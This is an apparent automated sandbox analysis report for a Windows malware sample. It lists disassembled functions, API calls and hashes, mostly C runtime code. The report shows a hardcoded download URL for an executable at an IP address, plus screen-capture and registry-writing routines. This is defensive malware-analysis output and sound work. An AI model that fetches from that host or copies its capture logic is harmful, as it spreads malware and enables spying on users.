Function 0042E104 Relevance: 4.6, APIs: 3, Instructions: 54
threadCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNEL32(?,?,Function_0002DFB0,00000000,?,?), ref: 0042E14D
GetLastError.KERNEL32(?,?,?,?,?,0040CF04,00000000,00000000,?,?,00000000,?), ref: 0042E159
__dosmaperr.LIBCMT ref: 0042E160

Memory Dump Source

Source File: 00000002.00000002.3827303048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_fuk7RfLrD3.jbxd

Similarity

API ID: CreateErrorLastThread__dosmaperr
String ID:
API String ID: 2744730728-0
Opcode ID: 7111d36ae7d9c15de437581cc3a8b466686a4c726987840fc25d61e653133f3e
Instruction ID: 0446f91cba5bc1877a5460ce95bae766c471c3d01d015a917539d7ef00797947
Opcode Fuzzy Hash: 7111d36ae7d9c15de437581cc3a8b466686a4c726987840fc25d61e653133f3e
Instruction Fuzzy Hash: FF01D236600139BBDB119FA3FC05AAF7B6AEF85720F40003AF80582210DB358D21C7A9

Function 00434745 Relevance: 4.6, APIs: 3, Instructions: 50
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetFilePointerEx.KERNEL32(00000000,00000000,0040DDCB,00000000,00000002,0040DDCB,00000000,?,?,?,004347F4,00000000,00000000,0040DDCB,00000002), ref: 0043477E
GetLastError.KERNEL32(?,004347F4,00000000,00000000,0040DDCB,00000002,?,0042C151,?,00000000,00000000,00000001,?,0040DDCB,?,0042C206), ref: 00434788
__dosmaperr.LIBCMT ref: 0043478F

Memory Dump Source

Source File: 00000002.00000002.3827303048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_fuk7RfLrD3.jbxd

Similarity

API ID: ErrorFileLastPointer__dosmaperr
String ID:
API String ID: 2336955059-0
Opcode ID: 0f8939188b6fdc8a7da50d1b405e1129083f9e2b96a50d0a3cd5949e7845d65d
Instruction ID: 754c6ade6be4612c7e0c4d55d151f31ddb378772f23eed9c1438f533fa7de6e2
Opcode Fuzzy Hash: 0f8939188b6fdc8a7da50d1b405e1129083f9e2b96a50d0a3cd5949e7845d65d
Instruction Fuzzy Hash: 92012836710114ABDB159FAADC058EE7B2AEFCA721F24020AF81597290EB74ED528794

Function 00402BA3 Relevance: 4.5, APIs: 3, Instructions: 41
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegCreateKeyExW.KERNEL32(80000001,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00402BC5
RegSetValueExW.KERNEL32(?,?,00000000,00000001,?,00000004,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00402BDD
RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00402BED

Memory Dump Source

Source File: 00000002.00000002.3827303048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_fuk7RfLrD3.jbxd

Similarity

API ID: CloseCreateValue
String ID:
API String ID: 1818849710-0
Opcode ID: 17a0f39c5dea863e0681c067e94205fb1cf9212befe975e377a74504568b03c9
Instruction ID: 504cdbf1e8d79b6d7283afc99896261950e1a919ac783b79018d19fe3f3d7e53
Opcode Fuzzy Hash: 17a0f39c5dea863e0681c067e94205fb1cf9212befe975e377a74504568b03c9
Instruction Fuzzy Hash: 16F0B4B650011CFFEB214F94DD89DABBA7CEB047E9F100175FA01B2150D6B19E009664

Function 0042E064 Relevance: 4.5, APIs: 3, Instructions: 31
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00431F4E: GetLastError.KERNEL32(?,?,?,0042EABE,00434D6C,?,00431EF8,00000001,00000364,?,0042DFD5,00457910,00000010), ref: 00431F53
Part of subcall function 00431F4E: _free.LIBCMT ref: 00431F88
Part of subcall function 00431F4E: SetLastError.KERNEL32(00000000), ref: 00431FBC

ExitThread.KERNEL32 ref: 0042E076
CloseHandle.KERNEL32(?,?,?,0042E196,?,?,0042E00D,00000000), ref: 0042E09E
FreeLibraryAndExitThread.KERNEL32(?,?,?,?,0042E196,?,?,0042E00D,00000000), ref: 0042E0B4

Memory Dump Source

Source File: 00000002.00000002.3827303048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_fuk7RfLrD3.jbxd

Similarity

API ID: ErrorExitLastThread$CloseFreeHandleLibrary_free
String ID:
API String ID: 1198197534-0
Opcode ID: 358fd455719f577d8bc93a3d3127ed53d65e98e9d00355e3dd6338ab7ece4e02
Instruction ID: fd9bad38e730a393213bf68ec19d44fd98ecce05ba50bc9e79acb20fd3a4735a
Opcode Fuzzy Hash: 358fd455719f577d8bc93a3d3127ed53d65e98e9d00355e3dd6338ab7ece4e02
Instruction Fuzzy Hash: 8CF05E342006347BEB319F37EC08A5B7A98AF05725F584756B924C22A1DBBCDD82869C

Function 00402394 Relevance: 3.1, APIs: 2, Instructions: 125
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32(?,?,?,?), ref: 004023BB
PostQuitMessage.USER32(00000000), ref: 00402559

Memory Dump Source

Source File: 00000002.00000002.3827303048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_fuk7RfLrD3.jbxd

Similarity

API ID: MessagePostProcQuitWindow
String ID:
API String ID: 3873111417-0
Opcode ID: d57fbe59a329fb309be7fe1269fcb85092641ffb4e542ab0082b7c0a7099a69f
Instruction ID: bf68dd1ed3332b821989bb5fb7b10a9ee1776f212d734df2d08f0bb157d40bf1
Opcode Fuzzy Hash: d57fbe59a329fb309be7fe1269fcb85092641ffb4e542ab0082b7c0a7099a69f
Instruction Fuzzy Hash: 1A412D11A64380A5E630FFA5BC55B2533B0FF54712F10653BE524DB2B6E3B28544C75E

Function 0040155A Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 101
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00001562), ref: 00401562

Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010C1
Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010DD

Strings

http://176.113.115.19/ScreenUpdateSync.exe, xrefs: 0040156D, 004016A6

Memory Dump Source

Source File: 00000002.00000002.3827303048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_fuk7RfLrD3.jbxd

Similarity

API ID: _wcslen$Sleep
String ID: http://176.113.115.19/ScreenUpdateSync.exe
API String ID: 3358372957-3120454669
Opcode ID: 7701b78b2553ec30eafcf5b5a8124595c597b4782acb6499a108b1673ff50c75
Instruction ID: 7c00d7bba67f06605ca45885bb35db497ce8a02c3eee20c143d632ed8421155e
Opcode Fuzzy Hash: 7701b78b2553ec30eafcf5b5a8124595c597b4782acb6499a108b1673ff50c75
Instruction Fuzzy Hash: 49317955A6538094E330DFA0BC56B252370FF64B52F50653BD60CCB2B2E7A18587C75E

Function 00434176 Relevance: 1.7, APIs: 1, Instructions: 151COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3827303048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_fuk7RfLrD3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 77dff8414438c132d9b1b222249ac9577754d763359ce41167806e2a442978e4
Instruction ID: bbb5b7410918ed3a19f08aeefc1504024edbbdc2131895f71ed4605d11f41fec
Opcode Fuzzy Hash: 77dff8414438c132d9b1b222249ac9577754d763359ce41167806e2a442978e4
Instruction Fuzzy Hash: EB51E971A00214AFDB10DF59C844BEA7BA1EFC9364F19929AF8099B391C735FD42CB94

Function 00403695 Relevance: 1.6, APIs: 1, Instructions: 95COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 00403772

Memory Dump Source

Source File: 00000002.00000002.3827303048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_fuk7RfLrD3.jbxd

Similarity

API ID: __fread_nolock
String ID:
API String ID: 2638373210-0
Opcode ID: a181b7be805d7fa44ac39242885525ea8222ab64a8fcafdecb561f0e5ce962c8
Instruction ID: 4d174249788eeb6afcd1119ee109bea02bf0543b951493d32b1ba631c5db93a5
Opcode Fuzzy Hash: a181b7be805d7fa44ac39242885525ea8222ab64a8fcafdecb561f0e5ce962c8
Instruction Fuzzy Hash: 18319CB1604716AFC710DE2AC88091ABFA8BF84351F04853EFC44A7391D779EA548BCA

Function 00402819 Relevance: 1.6, APIs: 1, Instructions: 69COMMON

Download Yara Rule

APIs

std::ios_base::_Ios_base_dtor.LIBCPMT ref: 004028FC

Memory Dump Source

Source File: 00000002.00000002.3827303048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_fuk7RfLrD3.jbxd

Similarity

API ID: Ios_base_dtorstd::ios_base::_
String ID:
API String ID: 323602529-0
Opcode ID: 72fdb1b190d3a1d2d7d6c29d22f11b53277dfea25eaf381d8fe65a68052a5e16
Instruction ID: a96161e1099ed2e4ebc89c8b3bfd47f038f5993eec498a984b7603ffbfb0c6fe
Opcode Fuzzy Hash: 72fdb1b190d3a1d2d7d6c29d22f11b53277dfea25eaf381d8fe65a68052a5e16
Instruction Fuzzy Hash: C8312BB4D002199BDB14EFA5D881AEDBBB4BF48304F5085AEE415B3281DB786A48CF54

Function 00403CB8 Relevance: 1.6, APIs: 1, Instructions: 59COMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 00403CBF

Memory Dump Source

Source File: 00000002.00000002.3827303048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_fuk7RfLrD3.jbxd

Similarity

API ID: H_prolog3_catch
String ID:
API String ID: 3886170330-0
Opcode ID: ccf9f932eb112f7f3215526f30a1f7312533cc0aacad866aa3aa8a24b0442ac4
Instruction ID: df22ffae6d2fe3b800e0c8e4f2770173a5e1bd04bbee8454eb0c8e7fe139aa3e
Opcode Fuzzy Hash: ccf9f932eb112f7f3215526f30a1f7312533cc0aacad866aa3aa8a24b0442ac4
Instruction Fuzzy Hash: C1215B70A00205EFCB15DF55C484EAEBBB5BF88705F14816EE805AB3A1C778AE50DF94

Function 00432775 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

__wsopen_s.LIBCMT ref: 004327B3

Memory Dump Source

Source File: 00000002.00000002.3827303048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_fuk7RfLrD3.jbxd

Similarity

API ID: __wsopen_s
String ID:
API String ID: 3347428461-0
Opcode ID: ebde34e331f36d73ae22f6b7be2bf13c9f524ff7c3251c4fe3554b52cc0156cf
Instruction ID: ab2784c25bcc6a383b761dc233afc1089a93ea485bdb2d241c4dcfca41164893
Opcode Fuzzy Hash: ebde34e331f36d73ae22f6b7be2bf13c9f524ff7c3251c4fe3554b52cc0156cf
Instruction Fuzzy Hash: 2511487590420AAFCF05DF58E94199B7BF4FF48314F10406AF808AB311D770EA11CBA9

Function 0043CFBB Relevance: 1.5, APIs: 1, Instructions: 36COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0043CFFC

Memory Dump Source

Source File: 00000002.00000002.3827303048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_fuk7RfLrD3.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: dcff01ba0718bc25fbadba801be0e76f759b5211c2d86b2f90a3e61a906836b7
Instruction ID: 35ea3ad1aa6a7a88a67b465f5c451a9d93fb5bd3893c922deb476a376b6bfb46
Opcode Fuzzy Hash: dcff01ba0718bc25fbadba801be0e76f759b5211c2d86b2f90a3e61a906836b7
Instruction Fuzzy Hash: 3EF0BE33810008BBCF115E96DC01DDF3B6EEF8D339F100116F914921A0DB3ACA22ABA4

Function 00433697 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,0040D866,00000000,?,0042678E,00000002,00000000,00000000,00000000,?,0040CD17,0040D866,00000004,00000000,00000000,00000000), ref: 004336C9

Memory Dump Source

Source File: 00000002.00000002.3827303048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_fuk7RfLrD3.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 94f750592cee1f743f5fc95d96a6c8fbd485f7a37a0c4c452716bcfbad1791b8
Instruction ID: eec6a97fd20e662809c0c25a02e68f43ccf4a0d84c2e20558320e6cd2c3c69d0
Opcode Fuzzy Hash: 94f750592cee1f743f5fc95d96a6c8fbd485f7a37a0c4c452716bcfbad1791b8
Instruction Fuzzy Hash: 6CE0E5213006207FDA303F675C06B5B36489F49BBAF142137AC06927D1DB2CEE0085ED

Function 0040FB02 Relevance: 1.5, APIs: 1, Instructions: 28COMMONLIBRARYCODE

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 004103B7

Memory Dump Source

Source File: 00000002.00000002.3827303048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_fuk7RfLrD3.jbxd

Similarity

API ID: Exception@8Throw
String ID:
API String ID: 2005118841-0
Opcode ID: b2a61ea650375c75c53941cf1669b74608d6a6abec66458302ae90db8424a762
Instruction ID: 7514a9331385c8c8780a364a21f4f069850cbfc0a8d6a65b648f56ba84841e90
Opcode Fuzzy Hash: b2a61ea650375c75c53941cf1669b74608d6a6abec66458302ae90db8424a762
Instruction Fuzzy Hash: 75E02B3050020DB3CB147665FC1185D777C5A10318BA04237BC28A14D1DF78E59DC48D

Function 0043CCFA Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,00000000,?,0043D0D5,?,?,00000000,?,0043D0D5,00000000,0000000C), ref: 0043CD17

Memory Dump Source

Source File: 00000002.00000002.3827303048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_fuk7RfLrD3.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: c1825962b9e2d68b99604ae1ec91ea351fd51148a2f332f138c69e8dc7c90181
Instruction ID: f5cec35e3468c2ebfedbe18043dc9de9c020ce50a8bef62643be49baa2ffa0a5
Opcode Fuzzy Hash: c1825962b9e2d68b99604ae1ec91ea351fd51148a2f332f138c69e8dc7c90181
Instruction Fuzzy Hash: DCD06C3200014DBBDF028F84DC06EDA3BAAFB48714F014150BA1856020C732E921AB95

Non-executed Functions

Function 0043B75E Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,0043BA7D,?,00000000), ref: 0043B7F7
GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,0043BA7D,?,00000000), ref: 0043B820
GetACP.KERNEL32(?,?,0043BA7D,?,00000000), ref: 0043B835

Strings

OCP, xrefs: 0043B7B2
ACP, xrefs: 0043B77C

Memory Dump Source

Source File: 00000002.00000002.3827303048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_fuk7RfLrD3.jbxd

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
Instruction ID: 1b44de1f7026d878333f9870d974062101081d782898e535d61b674f6735b06a
Opcode Fuzzy Hash: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
Instruction Fuzzy Hash: 0821CB75A00105A6D7349F14C901BA773AAEF9CF60F569466EA09D7310E736DD41C3D8

Function 0043B932 Relevance: 7.7, APIs: 5, Instructions: 188COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00431ECA: GetLastError.KERNEL32(?,?,0042DFD5,00457910,00000010), ref: 00431ECE
Part of subcall function 00431ECA: _free.LIBCMT ref: 00431F01
Part of subcall function 00431ECA: SetLastError.KERNEL32(00000000), ref: 00431F42

Part of subcall function 00431ECA: _free.LIBCMT ref: 00431F29
Part of subcall function 00431ECA: SetLastError.KERNEL32(00000000), ref: 00431F36

GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0043BA3E
IsValidCodePage.KERNEL32(00000000), ref: 0043BA99
IsValidLocale.KERNEL32(?,00000001), ref: 0043BAA8
GetLocaleInfoW.KERNEL32(?,00001001,004307A5,00000040,?,004308C5,00000055,00000000,?,?,00000055,00000000), ref: 0043BAF0
GetLocaleInfoW.KERNEL32(?,00001002,00430825,00000040), ref: 0043BB0F

Memory Dump Source

Source File: 00000002.00000002.3827303048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_fuk7RfLrD3.jbxd

Similarity

API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser
String ID:
API String ID: 2287132625-0
Opcode ID: 38d8fd1994316528ab50ff09970b315fc0b2a3ba84deb6354b1998d5a23f6b58
Instruction ID: e5497ab5c31cc8eb6cce8c5579f1d7db95bd29b644ec7623244df27cb8a16c00
Opcode Fuzzy Hash: 38d8fd1994316528ab50ff09970b315fc0b2a3ba84deb6354b1998d5a23f6b58
Instruction Fuzzy Hash: E25173719006099BDB10EFA5DC45BBF73B8FF4C700F14556BEA14E7290EB789A048BA9

Function 0043AFFA Relevance: 6.2, APIs: 4, Instructions: 236COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00431ECA: GetLastError.KERNEL32(?,?,0042DFD5,00457910,00000010), ref: 00431ECE
Part of subcall function 00431ECA: _free.LIBCMT ref: 00431F01
Part of subcall function 00431ECA: SetLastError.KERNEL32(00000000), ref: 00431F42

IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,004307AC,?,?,?,?,00430203,?,00000004), ref: 0043B0DC
_wcschr.LIBVCRUNTIME ref: 0043B16C
_wcschr.LIBVCRUNTIME ref: 0043B17A
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,004307AC,00000000,004308CC), ref: 0043B21D

Memory Dump Source

Source File: 00000002.00000002.3827303048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_fuk7RfLrD3.jbxd

Similarity

API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_free
String ID:
API String ID: 2444527052-0
Opcode ID: 7ed3a86c29a382af421c1474aa1bc1332d6e23e5dd750d7bbc09ab77345b00e1
Instruction ID: 0696757347486699991afdae1c367ad9a815ca2b39bc809b388401715a4d6b3e
Opcode Fuzzy Hash: 7ed3a86c29a382af421c1474aa1bc1332d6e23e5dd750d7bbc09ab77345b00e1
Instruction Fuzzy Hash: D1611871600206AADB24AB75DC46BBB73A8EF0D340F14146FFA15D7281EB7CE95087E9

Function 004389E2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 127COMMON

Download Yara Rule

Strings

/, xrefs: 00438AAC

Memory Dump Source

Source File: 00000002.00000002.3827303048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_fuk7RfLrD3.jbxd

Similarity

API ID:
String ID: /
API String ID: 0-2043925204
Opcode ID: 9f35882ade819549731607cbebdcf7e443c3af80474b374bb13d2dd880a55ca5
Instruction ID: 3adc650e711776362111ab5e43553b3f0cbdd7ddf1b9c00206e195fcc59ee936
Opcode Fuzzy Hash: 9f35882ade819549731607cbebdcf7e443c3af80474b374bb13d2dd880a55ca5
Instruction Fuzzy Hash: FB414B725003196FCB20AFB9DC49EBBB778EB88314F10026EF915D7281EA749D41CB58

Function 0043BBB1 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0043BBB1

Memory Dump Source

Source File: 00000002.00000002.3827303048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_fuk7RfLrD3.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: b4ea6d87a370488c09fcd641e95d7d939a449e6ed78a54530fece2258cf524d5
Instruction ID: 646215492ee1b006629ac518ce4a11708067c45d14fae9e363609ac2be79142b
Opcode Fuzzy Hash: b4ea6d87a370488c09fcd641e95d7d939a449e6ed78a54530fece2258cf524d5
Instruction Fuzzy Hash: 3FA02230A00300EF8380CF30AE0830E3BE8BE03AC3B008238A002C3030EB30C0808B08

Function 004020F0 Relevance: 49.2, APIs: 27, Strings: 1, Instructions: 205COMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,00000014,?,?), ref: 0040212B
GetClientRect.USER32(?,?), ref: 00402140
GetDC.USER32(?), ref: 00402147
CreateSolidBrush.GDI32(00646464), ref: 0040215A
SelectObject.GDI32(00000000,00000000), ref: 0040216E
CreatePen.GDI32(00000001,00000001,00FFFFFF), ref: 00402179
SelectObject.GDI32(00000000,00000000), ref: 00402187
Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 0040219A
GetDeviceCaps.GDI32(00000000,0000005A), ref: 004021A5
MulDiv.KERNEL32(00000008,00000000), ref: 004021AE
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000031,Tahoma), ref: 004021D2
SelectObject.GDI32(00000000,00000000), ref: 004021E0
SetBkMode.GDI32(?,00000001), ref: 0040225D
SetTextColor.GDI32(?,00000000), ref: 0040226C
_wcslen.LIBCMT ref: 00402275

Strings

Tahoma, xrefs: 004021B4

Memory Dump Source

Source File: 00000002.00000002.3827303048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_fuk7RfLrD3.jbxd

Similarity

API ID: CreateObjectSelect$BrushCapsClientColorDeviceFontModeProcRectRectangleSolidTextWindow_wcslen
String ID: Tahoma
API String ID: 3832963559-3580928618
Opcode ID: 33b9b76472e38ae72e1de4aa9982544c59de680f6868419fd236333dfe6a8388
Instruction ID: 93c85de950fa204d17176c6e5f5269daa7db8447991b35657298edc932ea58e6
Opcode Fuzzy Hash: 33b9b76472e38ae72e1de4aa9982544c59de680f6868419fd236333dfe6a8388
Instruction Fuzzy Hash: FD710072900228AFDB22DF64DD85FAEB7BCEF09711F0041A5B609E6155DA74AF80CF54

Function 00402567 Relevance: 38.7, APIs: 21, Strings: 1, Instructions: 186windowkeyboardfileCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?), ref: 004025C3
DefWindowProcW.USER32(?,00000204,?,?), ref: 004025D5
ReleaseCapture.USER32 ref: 004025E8
GetDC.USER32(00000000), ref: 0040260F
CreateCompatibleBitmap.GDI32(?,-0045D5E7,00000001), ref: 00402696
CreateCompatibleDC.GDI32(?), ref: 0040269F
SelectObject.GDI32(00000000,00000000), ref: 004026A9
BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00CC0020), ref: 004026D7
ShowWindow.USER32(?,00000000), ref: 004026E0
GetTempPathW.KERNEL32(00000104,?), ref: 004026F2
GetTempFileNameW.KERNEL32(?,hef,00000000,?), ref: 0040270D
DeleteFileW.KERNEL32(?), ref: 00402727
DeleteDC.GDI32(00000000), ref: 0040272E
DeleteObject.GDI32(00000000), ref: 00402735
ReleaseDC.USER32(00000000,?), ref: 00402743
DestroyWindow.USER32(?), ref: 0040274A
SetCapture.USER32(?), ref: 00402797
GetDC.USER32(00000000), ref: 004027CB
ReleaseDC.USER32(00000000,00000000), ref: 004027E1
GetKeyState.USER32(0000001B), ref: 004027EE
DestroyWindow.USER32(?), ref: 00402803

Strings

hef, xrefs: 00402701

Memory Dump Source

Source File: 00000002.00000002.3827303048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_fuk7RfLrD3.jbxd

Similarity

API ID: Window$DeleteDestroyRelease$CaptureCompatibleCreateFileObjectTemp$BitmapNamePathProcSelectShowState
String ID: hef
API String ID: 2545303185-98441221
Opcode ID: c1ac1bd017a9acd203bd2fc245b57fc6318294ea1881e019892625608c4a2c2b
Instruction ID: 592aba8080b11a69c6e8af25da0e3a71807a27334faeadba24c5a0a63d01ebad
Opcode Fuzzy Hash: c1ac1bd017a9acd203bd2fc245b57fc6318294ea1881e019892625608c4a2c2b
Instruction Fuzzy Hash: 5B61A3B5900219AFCB24AF64DD48BAA7BB8FF48706F044179F605E22A1D7B4DA41CB1C

Function 0042E6A2 Relevance: 22.8, APIs: 15, Instructions: 296COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0042E712
_free.LIBCMT ref: 0042E728
_free.LIBCMT ref: 0042E739
_free.LIBCMT ref: 0042E74A
_free.LIBCMT ref: 0042E761
GetCPInfo.KERNEL32(?,?), ref: 0042E7A9

Part of subcall function 004366DB: _free.LIBCMT ref: 00436746

_free.LIBCMT ref: 0042E955
_free.LIBCMT ref: 0042E968
_free.LIBCMT ref: 0042E976
_free.LIBCMT ref: 0042E981
_free.LIBCMT ref: 0042E9C3
_free.LIBCMT ref: 0042E9CB
_free.LIBCMT ref: 0042E9D3
_free.LIBCMT ref: 0042E9DB
_free.LIBCMT ref: 0042E9E9

Memory Dump Source

Source File: 00000002.00000002.3827303048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_fuk7RfLrD3.jbxd

Similarity

API ID: _free$Info
String ID:
API String ID: 2509303402-0
Opcode ID: 3c8bd96b14d453fc78fbdfa0c935f0ea1f368fed7a7b63a3d2dca3ea6bd9dcea
Instruction ID: 00ca1cae550ae33e56ff2d48992555244a41b63278d5bed064242715bcfe7aee
Opcode Fuzzy Hash: 3c8bd96b14d453fc78fbdfa0c935f0ea1f368fed7a7b63a3d2dca3ea6bd9dcea
Instruction Fuzzy Hash: 45B1CFB1E002159EEB11DF66C841BEEBBB4FF08304F54446FF999A7342D739A9418B28

Function 0043A5E8 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 0043A62C

Part of subcall function 0043997B: _free.LIBCMT ref: 00439998
Part of subcall function 0043997B: _free.LIBCMT ref: 004399AA
Part of subcall function 0043997B: _free.LIBCMT ref: 004399BC
Part of subcall function 0043997B: _free.LIBCMT ref: 004399CE
Part of subcall function 0043997B: _free.LIBCMT ref: 004399E0
Part of subcall function 0043997B: _free.LIBCMT ref: 004399F2
Part of subcall function 0043997B: _free.LIBCMT ref: 00439A04
Part of subcall function 0043997B: _free.LIBCMT ref: 00439A16
Part of subcall function 0043997B: _free.LIBCMT ref: 00439A28
Part of subcall function 0043997B: _free.LIBCMT ref: 00439A3A
Part of subcall function 0043997B: _free.LIBCMT ref: 00439A4C
Part of subcall function 0043997B: _free.LIBCMT ref: 00439A5E
Part of subcall function 0043997B: _free.LIBCMT ref: 00439A70

_free.LIBCMT ref: 0043A621

Part of subcall function 0043345A: HeapFree.KERNEL32(00000000,00000000,?,0043A0E8,?,00000000,?,00000000,?,0043A38C,?,00000007,?,?,0043A780,?), ref: 00433470
Part of subcall function 0043345A: GetLastError.KERNEL32(?,?,0043A0E8,?,00000000,?,00000000,?,0043A38C,?,00000007,?,?,0043A780,?,?), ref: 00433482

_free.LIBCMT ref: 0043A643
_free.LIBCMT ref: 0043A658
_free.LIBCMT ref: 0043A663
_free.LIBCMT ref: 0043A685
_free.LIBCMT ref: 0043A698
_free.LIBCMT ref: 0043A6A6
_free.LIBCMT ref: 0043A6B1
_free.LIBCMT ref: 0043A6E9
_free.LIBCMT ref: 0043A6F0
_free.LIBCMT ref: 0043A70D
_free.LIBCMT ref: 0043A725

Memory Dump Source

Source File: 00000002.00000002.3827303048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

